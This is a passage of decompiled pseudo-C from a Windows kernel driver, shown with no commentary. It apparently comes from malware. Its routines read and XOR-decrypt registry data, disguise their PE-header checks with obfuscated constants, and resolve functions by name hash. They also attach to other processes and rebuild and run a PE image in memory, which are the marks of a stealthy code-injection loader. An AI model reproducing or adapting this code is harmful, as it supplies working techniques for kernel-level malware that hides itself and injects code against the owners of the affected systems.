            if ( sub_1172E(v2, 40 * (unsigned __int16)v0 + v6) )
            {
              v8 = *(_DWORD *)(v7 + 16);
              if ( *(_DWORD *)(v7 + 8) < v8 )
                v8 = *(_DWORD *)(v7 + 8);
              v9 = v15 + *(_DWORD *)(v7 + 12);
              v10 = (const char *)(v15 + *(_DWORD *)(v7 + 12));
              v17 = 1;
              sub_11884((int)&v12, v10, v9 + v2, (int)&v16, (int)&v17);
              if ( v17 )
                break;
            }
            ++v0;
            if ( (_WORD)v0 >= (unsigned __int16)v5 )
            {
              if ( !v16 )
                break;
              dword_14134 = v16;
              return &dword_14134;
            }
          }
        }
      }
    }
    dword_14138 = -1073741823;
  }
  return &dword_14134;
}
// 14134: using guessed type int dword_14134;
// 14138: using guessed type int dword_14138;

//----- (00011A48) --------------------------------------------------------
int __stdcall sub_11A48(int a1)
{
  int v1; // eax@1
  int result; // eax@2
  int v3; // ebx@4
  int v4; // [sp+0h] [bp-8h]@6
  int v5; // [sp+4h] [bp-4h]@6

  v1 = *(_DWORD *)(a1 + 96);
  *(_DWORD *)(a1 + 28) = 0;
  if ( *(_DWORD *)(v1 + 8) != 40 || *(_DWORD *)(v1 + 4) != 40 )
  {
    result = -1073741811;
  }
  else
  {
    v3 = *(_DWORD *)(a1 + 12);
    if ( *(_DWORD *)v3 == -1347686387 )
    {
      v5 = 0;
      sub_10922((int)&v4, &v5);
      result = v5;
      if ( !v5 )
      {
        result = (*(int (__stdcall **)(_DWORD, int, int, _DWORD, int))v4)(
                   *(_DWORD *)(v3 + 8),
                   v3 + 16,
                   v3 + 24,
                   *(_DWORD *)(v3 + 32),
                   v3 + 32);
        if ( !result )
        {
          *(_DWORD *)(a1 + 28) = 40;
          result = 0;
        }
      }
    }
    else
    {
      result = -1073741811;
    }
  }
  return result;
}

//----- (00011AC2) --------------------------------------------------------
char __stdcall sub_11AC2(int a1, unsigned int a2)
{
  char result; // al@1
  unsigned int v3; // ecx@1

  v3 = 0;
  result = 0;
  if ( a2 )
  {
    do
      result += *(_BYTE *)(v3++ + a1);
    while ( v3 < a2 );
  }
  return result;
}

//----- (00011ADE) --------------------------------------------------------
NTSTATUS __userpurge sub_11ADE<eax>(LSA_UNICODE_STRING *a1<eax>, PUNICODE_STRING ValueName, int a3)
{
  NTSTATUS v3; // esi@1
  OBJECT_ATTRIBUTES ObjectAttributes; // [sp+8h] [bp-20h]@1
  int v6; // [sp+20h] [bp-8h]@1
  HANDLE Handle; // [sp+24h] [bp-4h]@1

  ObjectAttributes.ObjectName = a1;
  LOBYTE(v6) = 0;
  Handle = 0;
  ObjectAttributes.Length = 24;
  ObjectAttributes.RootDirectory = 0;
  ObjectAttributes.Attributes = 64;
  ObjectAttributes.SecurityDescriptor = 0;
  ObjectAttributes.SecurityQualityOfService = 0;
  v3 = ZwOpenKey(&Handle, 0x20019u, &ObjectAttributes);
  LOBYTE(v6) = v3 == 0;
  if ( !v3 )
    v3 = sub_11B52((int)&v6, ValueName, a3);
  if ( (_BYTE)v6 )
  {
    LOBYTE(v6) = 0;
    ZwClose(Handle);
  }
  return v3;
}

//----- (00011B52) --------------------------------------------------------
signed int __stdcall sub_11B52(int a1, PUNICODE_STRING ValueName, int a3)
{
  PVOID v4; // edi@10
  signed int v5; // esi@14
  int v6; // eax@16
  int v7; // eax@17
  PVOID v8; // [sp-8h] [bp-34h]@7
  ULONG v9; // [sp-4h] [bp-30h]@7
  PVOID P; // [sp+10h] [bp-1Ch]@5
  ULONG ResultLength; // [sp+20h] [bp-Ch]@4
  NTSTATUS v12; // [sp+24h] [bp-8h]@5

  if ( !*(_BYTE *)a1
    || (ResultLength = 0,
        ZwQueryValueKey(*(HANDLE *)(a1 + 4), ValueName, KeyValuePartialInformation, 0, 0, &ResultLength) != -1073741789) )
    return -1073741823;
  v12 = 0;
  sub_105DA((int)&v12, ResultLength, (int)&P, 0);
  if ( v12 )
  {
    if ( !P )
      return v12;
    v9 = 0;
    v8 = P;
LABEL_8:
    ExFreePoolWithTag(v8, v9);
    return v12;
  }
  v4 = P;
  v12 = ZwQueryValueKey(*(HANDLE *)(a1 + 4), ValueName, KeyValuePartialInformation, P, ResultLength, &ResultLength);
  if ( v12 )
  {
    if ( !v4 )
      return v12;
    v9 = 0;
    v8 = v4;
    goto LABEL_8;
  }
  if ( *((_DWORD *)v4 + 1) == 3 )
  {
    v6 = (int)ExAllocatePool(0, 0x10u);
    if ( v6 )
    {
      v7 = sub_105DA((int)&v12, *((_DWORD *)v4 + 2), v6, (char *)v4 + 12);
      v4 = P;
    }
    else
    {
      v7 = 0;
    }
    sub_107A8(a3, (PVOID *)v7);
    v5 = 0;
    if ( v12 )
    {
      v5 = v12;
      goto LABEL_15;
    }
    if ( *(_DWORD *)(a3 + 4) )
      goto LABEL_15;
  }
  v5 = -1073741823;
LABEL_15:
  ExFreePoolWithTag(v4, 0);
  return v5;
}

//----- (00011C42) --------------------------------------------------------
int __usercall sub_11C42<eax>(char a1<al>, int a2<ecx>, unsigned int a3<esi>)
{
  unsigned int v3; // edx@2
  unsigned int v4; // eax@4
  int result; // eax@6
  char v7; // [sp+8h] [bp-10h]@1
  char v8; // [sp+Ch] [bp-Ch]@1
  signed int v9; // [sp+10h] [bp-8h]@1
  unsigned int v10; // [sp+14h] [bp-4h]@1

  v10 = a3 >> 1;
  v7 = a1 ^ 0x96;
  v8 = a1;
  v9 = 4;
  do
  {
    v3 = 0;
    if ( a3 )
    {
      do
      {
        *(_BYTE *)(v3 + a2) ^= v9 * v8 + v3 * v7;
        ++v3;
      }
      while ( v3 < a3 );
    }
    v4 = 0;
    if ( v10 )
    {
      do
      {
        *(_BYTE *)(v4 + a2) ^= *(_BYTE *)(((a3 + 1) >> 1) + a2 + v4);
        ++v4;
      }
      while ( v4 < v10 );
    }
    for ( result = a3 - 1; (unsigned int)result >= 1; --result )
      *(_BYTE *)(result + a2) -= *(_BYTE *)(result + a2 - 1);
  }
  while ( v9-- - 1 >= 0 );
  return result;
}

//----- (00011CBE) --------------------------------------------------------
int __stdcall sub_11CBE(int a1, int a2, HANDLE Handle)
{
  int v3; // eax@2
  int v4; // ecx@3
  int v5; // eax@5
  char ProcessInformation; // [sp+Ch] [bp-34h]@2
  int v8; // [sp+10h] [bp-30h]@3
  CPPEH_RECORD ms_exc; // [sp+28h] [bp-18h]@2

  *(_DWORD *)a1 = 0;
  *(_BYTE *)(a1 + 4) = 1;
  if ( !*(_DWORD *)a2 )
  {
    ms_exc.disabled = 0;
    v3 = sub_11E6E(Handle, &ProcessInformation);
    *(_DWORD *)a2 = v3;
    if ( !v3 )
    {
      v4 = v8;
      if ( v8 && (v5 = *(_DWORD *)(v8 + 8)) != 0 )
      {
        *(_DWORD *)a1 = v5;
        *(_BYTE *)(a1 + 4) = *(_BYTE *)(v4 + 2) != 0;
      }
      else
      {
        *(_DWORD *)a2 = -1073741823;
      }
    }
    ms_exc.disabled = -1;
  }
  return a1;
}

//----- (00011D3C) --------------------------------------------------------
int __userpurge sub_11D3C<eax>(int a1<esi>, int a2, int a3)
{
  *(_BYTE *)a1 = 0;
  sub_11F02(a1 + 4, a2, a3);
  memset((void *)(a1 + 12), 0, 0x18u);
  if ( !*(_DWORD *)a2 )
  {
    KeStackAttachProcess(*(_DWORD *)(a1 + 8), a1 + 12);
    *(_BYTE *)a1 = 1;
  }
  return a1;
}
// 123F4: using guessed type int __stdcall KeStackAttachProcess(_DWORD, _DWORD);

//----- (00011D7C) --------------------------------------------------------
int __stdcall sub_11D7C(const char *a1)
{
  ULONG v1; // edi@3
  PVOID v2; // esi@6
  int v4; // edi@17
  PVOID v5; // [sp-8h] [bp-3Ch]@5
  ULONG v6; // [sp-4h] [bp-38h]@5
  PVOID P; // [sp+10h] [bp-24h]@3
  int SystemInformation; // [sp+20h] [bp-14h]@1
  char *v9; // [sp+24h] [bp-10h]@3
  int v10; // [sp+28h] [bp-Ch]@13
  ULONG SystemInformationLength; // [sp+2Ch] [bp-8h]@1

  SystemInformationLength = 0;
  SystemInformation = 0;
  if ( ZwQuerySystemInformation(SystemModuleInformation, &SystemInformation, 0, &SystemInformationLength) != -1073741820
    || !SystemInformationLength )
    return 0;
  v9 = 0;
  sub_105DA((int)&v9, SystemInformationLength, (int)&P, 0);
  v1 = 0;
  if ( v9 )
  {
    if ( P )
    {
      v6 = 0;
      v5 = P;
LABEL_9:
      ExFreePoolWithTag(v5, v6);
    }
    return 0;
  }
  v2 = P;
  if ( ZwQuerySystemInformation(SystemModuleInformation, P, SystemInformationLength, (PULONG)&SystemInformation) )
  {
    if ( !v2 )
      return 0;
LABEL_8:
    v6 = v1;
    v5 = v2;
    goto LABEL_9;
  }
  if ( *(_DWORD *)v2 <= 0u )
    goto LABEL_8;
  v10 = 0;
  v9 = (char *)v2 + 30;
  while ( stricmp((const char *)v2 + v10 + *(_WORD *)v9 + 32, a1) )
  {
    v10 += 284;
    v9 += 284;
    ++v1;
    if ( v1 >= *(_DWORD *)v2 )
    {
      v1 = 0;
      goto LABEL_8;
    }
  }
  v4 = *((_DWORD *)v2 + 71 * v1 + 3);
  ExFreePoolWithTag(v2, 0);
  return v4;
}

//----- (00011E4C) --------------------------------------------------------
int __cdecl sub_11E4C()
{
  int result; // eax@1

  result = sub_11D7C(dword_12300);
  if ( !result )
    result = sub_11D7C(dword_12310);
  return result;
}

//----- (00011E6E) --------------------------------------------------------
int __stdcall sub_11E6E(HANDLE Handle, PVOID ProcessInformation)
{
  int result; // eax@4
  NTSTATUS v3; // esi@5
  char v4; // [sp+10h] [bp-10h]@1
  PVOID Object; // [sp+14h] [bp-Ch]@3
  ULONG ReturnLength; // [sp+18h] [bp-8h]@6
  int v7; // [sp+1Ch] [bp-4h]@1

  v7 = 0;
  sub_11F02((int)&v4, (int)&v7, (int)Handle);
  if ( v7 )
  {
    if ( v4 )
    {
      v4 = 0;
      ObfDereferenceObject(Object);
    }
    result = v7;
  }
  else
  {
    Handle = 0;
    v3 = ObOpenObjectByPointer(Object, 0, 0, 0, 0, 0, &Handle);
    if ( !v3 )
    {
      ReturnLength = 0;
      v3 = ZwQueryInformationProcess(Handle, 0, ProcessInformation, 0x18u, &ReturnLength);
    }
    if ( Handle )
      ZwClose(Handle);
    if ( v4 )
    {
      v4 = 0;
      ObfDereferenceObject(Object);
    }
    result = v3;
  }
  return result;
}
// 12404: using guessed type int __stdcall ObOpenObjectByPointer(_DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD);

//----- (00011F02) --------------------------------------------------------
int __userpurge sub_11F02<eax>(int a1<ebx>, int a2<edi>, int a3)
{
  char v3; // zf@1
  int v4; // eax@2

  *(_DWORD *)(a1 + 4) = 0;
  v3 = *(_DWORD *)a2 == 0;
  *(_BYTE *)a1 = 0;
  if ( v3 )
  {
    v4 = PsLookupProcessByProcessId(a3, a1 + 4);
    *(_DWORD *)a2 = v4;
    if ( !v4 )
    {
      if ( *(_DWORD *)(a1 + 4) )
        *(_BYTE *)a1 = 1;
      else
        *(_DWORD *)a2 = -1073741823;
    }
  }
  return a1;
}
// 12408: using guessed type int __stdcall PsLookupProcessByProcessId(_DWORD, _DWORD);

//----- (00011F3A) --------------------------------------------------------
LONG_PTR __usercall sub_11F3A<eax>(PVOID Object<ecx>, LONG_PTR result<eax>)
{
  void *v2; // ecx@2

  if ( *(_BYTE *)result )
  {
    v2 = *(void **)(result + 4);
    *(_BYTE *)result = 0;
    result = ObfDereferenceObject(v2);
  }
  return result;
}

//----- (00011F4C) --------------------------------------------------------
signed int __cdecl sub_11F4C(int a1, int a2)
{
  int v3; // eax@3
  unsigned __int16 v4; // dx@4
  int v5; // edx@7
  int v6; // ecx@7
  __int16 v7; // dx@12

  if ( *(_WORD *)a2 != 23117 || (v3 = a2 + *(_DWORD *)(a2 + 60), (*(_DWORD *)v3 ^ 0xF750F284) != -145705004) )
    return 1;
  v4 = *(_WORD *)(v3 + 4);
  if ( 22531 == (v4 ^ 0x594F) )
  {
    if ( (*(_WORD *)(v3 + 24) ^ 0x5908) == 22531 && *(_WORD *)(v3 + 20) == 224 )
    {
      v6 = a1;
      *(_DWORD *)a1 = 0;
      v5 = v3 + 120;
LABEL_12:
      *(_DWORD *)(v6 + 12) = v5;
      *(_DWORD *)(v6 + 22) = *(_DWORD *)(v3 + 80);
      *(_DWORD *)(v6 + 16) = *(_WORD *)(v3 + 20) + v3 + 24;
      v7 = *(_WORD *)(v3 + 6);
      *(_DWORD *)(v6 + 8) = v3;
      *(_WORD *)(v6 + 20) = v7;
      *(_DWORD *)(v6 + 4) = a2;
      return 0;
    }
  }
  else
  {
    if ( 22531 == (v4 ^ 0xDE67) && (*(_WORD *)(v3 + 24) ^ 0x5A08) == 22531 && *(_WORD *)(v3 + 20) == 240 )
    {
      v6 = a1;
      *(_DWORD *)a1 = 1;
      v5 = v3 + 136;
      goto LABEL_12;
    }
  }
  return 1;
}

//----- (00012017) --------------------------------------------------------
int __cdecl sub_12017(int a1, unsigned int a2)
{
  int result; // eax@2

  if ( a2 < *(_DWORD *)(a1 + 22) )
    result = a2 + *(_DWORD *)(a1 + 4);
  else
    result = 0;
  return result;
}

//----- (0001202D) --------------------------------------------------------
int __cdecl sub_1202D(int a1, unsigned int a2, int a3, int a4)
{
  int v4; // eax@1
  int result; // eax@2
  int v6; // edx@3

  v4 = *(_DWORD *)(a1 + 12) + 8 * a2;
  if ( a2 >= 0x10 )
    return 1;
  v6 = *(_DWORD *)v4;
  if ( *(_DWORD *)v4 )
  {
    if ( (unsigned int)(v6 + *(_DWORD *)(v4 + 4)) > *(_DWORD *)(a1 + 22) )
      return 1;
    *(_DWORD *)a3 = v6 + *(_DWORD *)(a1 + 4);
    *(_DWORD *)a4 = *(_DWORD *)(v4 + 4);
    result = 0;
  }
  else
  {
    result = (*(_DWORD *)(v4 + 4) == 0) + 1;
  }
  return result;
}

//----- (00012079) --------------------------------------------------------
int __cdecl sub_12079(int a1)
{
  int result; // eax@1
  int v2; // edx@1
  char v3; // cl@1
  int v4; // esi@2

  v2 = a1;
  v3 = *(_BYTE *)a1;
  for ( result = 0; *(_BYTE *)v2; result = v4 )
  {
    v4 = result * (7 * result + 1) + v3 * (17 * v3 + 12);
    ++v2;
    v3 = *(_BYTE *)v2;
  }
  return result;
}

//----- (000120AA) --------------------------------------------------------
int __fastcall sub_120AA(int a1, int a2, int a3, int a4, unsigned __int16 a5)
{
  int v5; // eax@1
  int v6; // edx@1
  int result; // eax@3
  unsigned int v8; // edx@3

  v5 = sub_12017(a3, *(_DWORD *)(a2 + 28));
  if ( !v5
    || (unsigned int)a5 >= *(_DWORD *)(v6 + 20)
    || (result = sub_12017(a3, *(_DWORD *)(v5 + 4 * a5)), !result)
    || result >= v8 && result < a4 + v8 )
    result = 0;
  return result;
}

//----- (000120E9) --------------------------------------------------------
int __cdecl sub_120E9(int a1, unsigned int a2)
{
  unsigned __int16 v2; // bx@1
  int v3; // edi@1
  int v4; // esi@1
  int v5; // eax@3
  unsigned int v6; // ecx@3
  int v7; // eax@5
  int result; // eax@8
  int v9; // [sp+14h] [bp+8h]@2

  v2 = *(_WORD *)(a1 + 20);
  v4 = *(_DWORD *)(a1 + 16);
  v3 = 0;
  if ( v2 <= 0u )
  {
LABEL_8:
    result = 0;
  }
  else
  {
    v9 = *(_DWORD *)(a1 + 4);
    while ( 1 )
    {
      v5 = v4 + 40 * (unsigned __int16)v3;
      v6 = *(_DWORD *)(v5 + 8);
      if ( v6 >= *(_DWORD *)(v5 + 16) )
        v6 = *(_DWORD *)(v5 + 16);
      v7 = v9 + *(_DWORD *)(v5 + 12);
      if ( a2 >= v7 )
      {
        if ( a2 < v6 + v7 )
          break;
      }
      ++v3;
      if ( (_WORD)v3 >= v2 )
        goto LABEL_8;
    }
    result = v4 + 40 * (unsigned __int16)v3;
  }
  return result;
}

//----- (00012145) --------------------------------------------------------
int __cdecl sub_12145(int a1, int a2)
{
  unsigned int v2; // esi@1
  int result; // eax@2
  int v4; // edi@3
  unsigned int v5; // ebx@6
  int v6; // eax@7
  int v7; // [sp-Ch] [bp-1Ch]@8
  int v8; // [sp+4h] [bp-Ch]@1
  int v9; // [sp+8h] [bp-8h]@4
  int v10; // [sp+Ch] [bp-4h]@1

  v2 = 0;
  if ( sub_1202D(a1, 0, (int)&v10, (int)&v8) )
  {
    result = 0;
  }
  else
  {
    v4 = v10;
    v10 = sub_12017(a1, *(_DWORD *)(v10 + 32));
    if ( v10 && (v9 = sub_12017(a1, *(_DWORD *)(v4 + 36))) != 0 )
    {
      v5 = *(_DWORD *)(v4 + 24);
      if ( v5 )
      {
        do
        {
          v6 = sub_12017(a1, *(_DWORD *)(v10 + 4 * v2));
          if ( !v6 )
            break;
          if ( sub_12079(v6) == a2 )
            return sub_120AA(v7, v4, a1, v8, *(_WORD *)(v9 + 2 * v2));
          ++v2;
        }
        while ( v2 < v5 );
      }
      result = 0;
    }
    else
    {
      result = 0;
    }
  }
  return result;
}

//----- (0001281C) --------------------------------------------------------
signed int __usercall sub_1281C<eax>(int a1<esi>)
{
  int v1; // edi@1
  int (__stdcall *v2)(_DWORD); // ebx@1
  int v3; // eax@1
  int v4; // eax@1
  signed int result; // eax@2

  v1 = sub_12BCC((void *)0x2B8);
  v2 = *(int (__stdcall **)(_DWORD))(v1 + 32);
  *(_DWORD *)(a1 + 8) = sub_12BCC((void *)0x66D);
  *(_DWORD *)(a1 + 12) = sub_12BCC((void *)0x6A1);
  *(_DWORD *)(a1 + 16) = sub_12BCC((void *)0x6BE);
  *(_DWORD *)(a1 + 20) = sub_12BCC((void *)0x6DE);
  *(_DWORD *)(a1 + 24) = *(_DWORD *)(v1 + 40);
  *(_DWORD *)(a1 + 28) = *(_DWORD *)(v1 + 24);
  *(_DWORD *)(a1 + 32) = *(_DWORD *)(v1 + 56);
  *(_DWORD *)(a1 + 36) = *(_DWORD *)(v1 + 64);
  *(_DWORD *)(a1 + 40) = *(_DWORD *)(v1 + 72);
  v3 = sub_12BCC((void *)0x260);
  v4 = v2(v3);
  *(_DWORD *)(a1 + 44) = v4;
  if ( v4 )
  {
    *(_DWORD *)(a1 + 52) = 0;
    *(_DWORD *)(a1 + 56) = 0;
    *(_DWORD *)(a1 + 60) = 1;
    result = 0;
  }
  else
  {
    result = 1;
  }
  return result;
}

//----- (000128A9) --------------------------------------------------------
signed int __cdecl sub_128A9(int a1)
{
  signed int result; // eax@1
  int v2; // edi@1
  int v3; // eax@2
  int v4; // eax@2
  int v5; // ecx@4
  char v6; // [sp+Ch] [bp-88h]@4
  int v7; // [sp+48h] [bp-4Ch]@1
  int v8; // [sp+4Ch] [bp-48h]@2
  int (__cdecl *v9)(char *); // [sp+8Ch] [bp-8h]@1
  int (__cdecl *v10)(int *, int); // [sp+90h] [bp-4h]@1

  v2 = *(_DWORD *)(a1 + 88);
  v10 = (int (__cdecl *)(int *, int))(v2 + 140 + *(_DWORD *)(v2 + 104));
  v9 = (int (__cdecl *)(char *))(v2 + 140 + *(_DWORD *)(v2 + 120));
  *(_WORD *)(v2 + 140) = 23117;
  *(_DWORD *)(v2 + 140 + *(_DWORD *)(v2 + 132)) = 17744;
  *(_WORD *)(v2 + 140 + *(_DWORD *)(v2 + 136)) = 267;
  result = sub_1281C((int)&v7);
  if ( !result )
  {
    v3 = *(_DWORD *)v2;
    v7 = v2 + 140;
    v8 = v3;
    v4 = sub_12BCC((void *)0x350);
    result = v10(&v7, v4);
    if ( !result )
    {
      result = sub_1281C((int)&v7);
      if ( !result )
      {
        v5 = *(_DWORD *)(a1 + 96);
        v8 = *(_DWORD *)(a1 + 104);
        v7 = v5;
        result = v10(&v7, (int)&v6);
        if ( !result )
        {
          result = v9(&v6);
          if ( result )
            result = ((int (*)(void))result)();
        }
      }
    }
  }
  return result;
}

//----- (00012B92) --------------------------------------------------------
bool __usercall sub_12B92<eax>(int a1<eax>, int a2)
{
  int (__stdcall *v2)(_DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD); // ecx@1
  bool result; // eax@2
  int v4; // [sp+0h] [bp-4h]@1

  v2 = *(int (__stdcall **)(_DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD))(a1 + 80);
  v4 = 0;
  if ( v2(*(_DWORD *)(a1 + 144), 2242560, a2, 40, a2, 40, &v4, 0) )
    result = v4 != 40;
  else
    result = 1;
  return result;
}

//----- (00012BCC) --------------------------------------------------------
int __thiscall sub_12BCC(void *this)
{
  return (int)((char *)this + 74892);
}

//----- (00013179) --------------------------------------------------------
signed int __usercall sub_13179<eax>(int a1<eax>, unsigned int a2)
{
  unsigned int v2; // edi@1
  int v4; // ecx@3
  unsigned int v5; // ebx@4
  int v6; // eax@7
  unsigned int v7; // edx@8
  int v8; // ecx@8
  unsigned int v9; // [sp+8h] [bp-4h]@1

  v9 = 0;
  LOWORD(v2) = *(_WORD *)(a1 + 20);
  if ( *(_DWORD *)a1 || (v4 = *(_DWORD *)(a1 + 8), *(_DWORD *)(v4 + 84) > a2) )
    return 2;
  v5 = *(_DWORD *)(a1 + 22);
  if ( !(*(_DWORD *)(a1 + 22) % *(_DWORD *)(v4 + 56)) && *(_WORD *)(v4 + 6) )
  {
    v2 = (unsigned __int16)v2;
    if ( !(_WORD)v2 )
      return 0;
    v6 = *(_DWORD *)(a1 + 16) + 16;
    while ( 1 )
    {
      v8 = *(_DWORD *)v6;
      v7 = *(_DWORD *)(v6 - 8);
      if ( *(_DWORD *)v6 >= v7 )
        v8 = *(_DWORD *)(v6 - 8);
      if ( v8 + *(_DWORD *)(v6 + 4) > a2 || v7 + *(_DWORD *)(v6 - 4) > v5 )
        break;
      v6 += 40;
      ++v9;
      if ( v9 >= v2 )
        return 0;
    }
  }
  return 2;
}

//----- (000131F5) --------------------------------------------------------
int __usercall sub_131F5<eax>(int a1<esi>, int a2, int a3, int a4)
{
  int v4; // ebx@1
  unsigned int v5; // edi@1

  v4 = 0;
  v5 = 0;
  if ( *(_DWORD *)(a1 + 56) )
  {
    while ( (*(int (__stdcall **)(int, _DWORD))(a1 + 36))(a2, *(_DWORD *)(*(_DWORD *)(a1 + 52) + v4))
         || (*(int (__stdcall **)(int, _DWORD))(a1 + 32))(a3, *(_DWORD *)(*(_DWORD *)(a1 + 52) + v4 + 4)) )
    {
      ++v5;
      v4 += 12;
      if ( v5 >= *(_DWORD *)(a1 + 56) )
        goto LABEL_5;
    }
    *(_DWORD *)a4 = *(_DWORD *)(12 * v5 + *(_DWORD *)(a1 + 52) + 8);
  }
  else
  {
LABEL_5:
    *(_DWORD *)a4 = 0;
  }
  return 0;
}

//----- (00013323) --------------------------------------------------------
int __usercall sub_13323<eax>(unsigned int *a1<eax>, int a2<ecx>, int a3<ebx>, int a4, int a5, int a6)
{
  unsigned int v6; // eax@1
  int v7; // esi@1
  int v8; // eax@2
  int v9; // eax@4
  int result; // eax@5
  int v11; // edi@6
  int v12; // eax@9

  v6 = *a1;
  v7 = a2;
  if ( (signed int)v6 < 0 )
  {
    v8 = (unsigned __int16)v6;
    goto LABEL_9;
  }
  if ( !v6 || (v9 = sub_13548(a4, v6), !v9) )
    return 4;
  v11 = v9 + 2;
  result = sub_131F5(v7, a5, v9 + 2, a3);
  if ( result )
    return result;
  if ( !*(_DWORD *)a3 )
  {
    v8 = v11;
LABEL_9:
    v12 = (*(int (__stdcall **)(int, int))(v7 + 28))(a6, v8);
    *(_DWORD *)a3 = v12;
    if ( v12 )
      return 0;
    return 4;
  }
  return 0;
}

//----- (00013447) --------------------------------------------------------
int __thiscall sub_13447(void *this)
{
  return (int)((char *)this - 4117060);
}

//----- (0001347D) --------------------------------------------------------
signed int __cdecl sub_1347D(int a1, int a2)
{
  int v3; // eax@3
  unsigned __int16 v4; // dx@4
  int v5; // edx@7
  int v6; // ecx@7
  __int16 v7; // dx@12

  if ( *(_WORD *)a2 != 23117 || (v3 = a2 + *(_DWORD *)(a2 + 60), (*(_DWORD *)v3 ^ 0xF750F284) != -145705004) )
    return 1;
  v4 = *(_WORD *)(v3 + 4);
  if ( 22531 == (v4 ^ 0x594F) )
  {
    if ( (*(_WORD *)(v3 + 24) ^ 0x5908) == 22531 && *(_WORD *)(v3 + 20) == 224 )
    {
      v6 = a1;
      *(_DWORD *)a1 = 0;
      v5 = v3 + 120;
LABEL_12:
      *(_DWORD *)(v6 + 12) = v5;
      *(_DWORD *)(v6 + 22) = *(_DWORD *)(v3 + 80);
      *(_DWORD *)(v6 + 16) = *(_WORD *)(v3 + 20) + v3 + 24;
      v7 = *(_WORD *)(v3 + 6);
      *(_DWORD *)(v6 + 8) = v3;
      *(_WORD *)(v6 + 20) = v7;
      *(_DWORD *)(v6 + 4) = a2;
      return 0;
    }
  }
  else
  {
    if ( 22531 == (v4 ^ 0xDE67) && (*(_WORD *)(v3 + 24) ^ 0x5A08) == 22531 && *(_WORD *)(v3 + 20) == 240 )
    {
      v6 = a1;
      *(_DWORD *)a1 = 1;
      v5 = v3 + 136;
      goto LABEL_12;
    }
  }
  return 1;
}

//----- (00013548) --------------------------------------------------------
int __cdecl sub_13548(int a1, unsigned int a2)
{
  int result; // eax@2

  if ( a2 < *(_DWORD *)(a1 + 22) )
    result = a2 + *(_DWORD *)(a1 + 4);
  else
    result = 0;
  return result;
}

//----- (0001355E) --------------------------------------------------------
int __cdecl sub_1355E(int a1, unsigned int a2, int a3, int a4)
{
  int v4; // eax@1
  int result; // eax@2
  int v6; // edx@3

  v4 = *(_DWORD *)(a1 + 12) + 8 * a2;
  if ( a2 >= 0x10 )
    return 1;
  v6 = *(_DWORD *)v4;
  if ( *(_DWORD *)v4 )
  {
    if ( (unsigned int)(v6 + *(_DWORD *)(v4 + 4)) > *(_DWORD *)(a1 + 22) )
      return 1;
    *(_DWORD *)a3 = v6 + *(_DWORD *)(a1 + 4);
    *(_DWORD *)a4 = *(_DWORD *)(v4 + 4);
    result = 0;
  }
  else
  {
    result = (*(_DWORD *)(v4 + 4) == 0) + 1;
  }
  return result;
}

//----- (000135AA) --------------------------------------------------------
int __cdecl sub_135AA(int a1)
{
  int result; // eax@1
  int v2; // edx@1
  char v3; // cl@1
  int v4; // esi@2

  v2 = a1;
  v3 = *(_BYTE *)a1;
  for ( result = 0; *(_BYTE *)v2; result = v4 )
  {
    v4 = result * (7 * result + 1) + v3 * (17 * v3 + 12);
    ++v2;
    v3 = *(_BYTE *)v2;
  }
  return result;
}

//----- (000136C7) --------------------------------------------------------
int __fastcall sub_136C7(int a1, int a2, int a3, int a4, unsigned __int16 a5)
{
  int v5; // eax@1
  int v6; // edx@1
  int result; // eax@3
  unsigned int v8; // edx@3

  v5 = sub_13548(a3, *(_DWORD *)(a2 + 28));
  if ( !v5
    || (unsigned int)a5 >= *(_DWORD *)(v6 + 20)
    || (result = sub_13548(a3, *(_DWORD *)(v5 + 4 * a5)), !result)
    || result >= v8 && result < a4 + v8 )
    result = 0;
  return result;
}

//----- (000137AD) --------------------------------------------------------
int __usercall sub_137AD<eax>(unsigned int a1<eax>, int a2<ecx>, int a3, int a4, int a5)
{
  int v5; // ecx@1
  int v6; // edi@1
  int v7; // esi@1
  int result; // eax@2
  int v9; // eax@4
  int v10; // ebx@4
  unsigned int v11; // [sp+Ch] [bp-4h]@1

  v6 = a2 + 4;
  v5 = a2 + a1 - 13;
  v7 = a1 - 4;
  v11 = v5;
  if ( a1 >= 0xD )
  {
    if ( v6 <= (unsigned int)v5 )
    {
      do
      {
        v9 = v7 + v6 - 4;
        v10 = v6;
        if ( v6 > (unsigned int)v9 )
        {
LABEL_7:
          v10 = 0;
        }
        else
        {
          while ( *(_DWORD *)v10 != a3 )
          {
            ++v10;
            if ( v10 > (unsigned int)v9 )
              goto LABEL_7;
          }
        }
        if ( !v10 || v10 - 4 > v11 )
          break;
        if ( sub_13822(a5, a4, v10 - 4, 0xDu) )
          return v10 - 4;
        v7 = v7 + v6 - v10 - 1;
        v6 = v10 + 1;
      }
      while ( v10 + 1 <= v11 );
    }
    result = 0;
  }
  else
  {
    result = 0;
  }
  return result;
}

//----- (00013822) --------------------------------------------------------
signed int __usercall sub_13822<eax>(int a1<eax>, int a2<edx>, int a3<ecx>, unsigned int a4)
{
  unsigned int v4; // edi@1
  int v5; // ecx@2
  int v6; // esi@2
  signed int result; // eax@5

  v4 = 0;
  if ( a4 )
  {
    v5 = a3 - a1;
    v6 = a2 - a1;
    while ( (*(_BYTE *)a1 & *(_BYTE *)(v5 + a1)) == *(_BYTE *)(v6 + a1) )
    {
      ++v4;
      ++a1;
      if ( v4 >= a4 )
        goto LABEL_5;
    }
    result = 0;
  }
  else
  {
LABEL_5:
    result = 1;
  }
  return result;
}

//----- (000138DF) --------------------------------------------------------
signed int __usercall sub_138DF<eax>(int a1<eax>, int a2, int a3, unsigned int a4, int (__cdecl *a5)(_DWORD, _DWORD, _DWORD))
{
  unsigned int v5; // ebx@1
  int v6; // esi@2
  int v7; // eax@5
  signed int result; // eax@9

  v5 = 0;
  if ( a4 )
  {
    v6 = a1 + 8;
    while ( 1 )
    {
      if ( (*(_DWORD *)(v6 + 28) & 0x60000020) == 1610612768 )
      {
        if ( !(*(_DWORD *)(v6 + 28) & 0x2000000) )
        {
          v7 = *(_DWORD *)v6;
          if ( *(_DWORD *)v6 >= *(_DWORD *)(v6 + 8) )
            v7 = *(_DWORD *)(v6 + 8);
          if ( a5(*(_DWORD *)(a2 + 44) + *(_DWORD *)(v6 + 4), v7, a3) )
            break;
        }
      }
      ++v5;
      v6 += 40;
      if ( v5 >= a4 )
        goto LABEL_9;
    }
    result = 1;
  }
  else
  {
LABEL_9:
    result = 0;
  }
  return result;
}

// ALL OK, 89 function(s) have been successfully decompiled
